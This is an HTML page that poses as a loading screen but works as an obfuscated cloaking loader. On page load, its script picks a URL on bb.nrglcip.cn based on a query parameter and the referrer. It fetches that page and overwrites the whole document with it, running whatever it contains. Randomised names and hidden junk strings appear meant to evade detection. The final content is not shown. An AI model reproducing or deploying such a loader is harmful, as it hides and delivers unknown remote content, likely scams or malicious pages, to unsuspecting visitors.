<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oKWcXB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oKWcXB .q74nby {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oKWcXB .content {
            line-height: 50px;
            text-align: center
        }

        .oKWcXB .img {
            width: 100%
        }

        .oKWcXB .QODbKmm {
            text-align: center
        }

        .oKWcXB .QODbKmm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oKWcXB .QODbKmm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oKWcXB .QODbKmm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oKWcXB .QODbKmm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oKWcXB .QODbKmm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oKWcXB .QODbKmm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oKWcXB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YxYqnXPsqY1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Bdu7tH = YxYqnXPsqY1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Bdu7tH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Bdu7tH +".html?a=share";
		}
		
        zx9ixy8j7I=url+"#"+new Date().getTime();
        zx9ixy8j7I && function() {
            $.get(zx9ixy8j7I, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>zth8qP6PeKJ2uDZvtW12il4RmVa3nQXV6</div>
<a  href='#' style='display:none'>dtLsoJbr8uRwlJM76YKo7F8eMYJABoaxP39HcvV1hYrEJZr5ftOfnUY</a>
<h1 style='display:none' >unvajihMYjDKzkyH70jBL</h1><div class="oKWcXB">
    <div class="q74nby">
        <div class="QODbKmm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >agt1IZS3PabETBmtADv30tOieXm4WGQIrYHF5lJEa0rG3pgI2jzMItS5f4oeEUYgHxAN54DEOvXTXdKH7A4q0EQbm3NzbH01n1IV</ul>
<p  style='display:none'>svm9h3H1NSZuqIMHCnyTQvOhLfLi2ZeIFxUx4vwQGWNedQYujrHD5ysaTI4aBU7qdaUQAfZ52X1QWpn5BRt</p>
<span style='display:none'>MpFIup2dYtFCiplvk8LAuUjLAnJFSrRzbIMxn1cV0a5rHgf0OOjxiK</span>
<b style='display:none' >ql1QJVy2Xw58yELbDWWWnf1biDmc</b>
<b style='display:none' >ql1QJVy2Xw58yELbDWWWnf1biDmc</b>
<li style='display:none' >JOe1qXNI35AUg6dzpl485XNrZAYB67jZR5UposzfTUiXI26psRsza7cffE1r3YY</li>
<span style='display:none'>MpFIup2dYtFCiplvk8LAuUjLAnJFSrRzbIMxn1cV0a5rHgf0OOjxiK</span></body>
</html>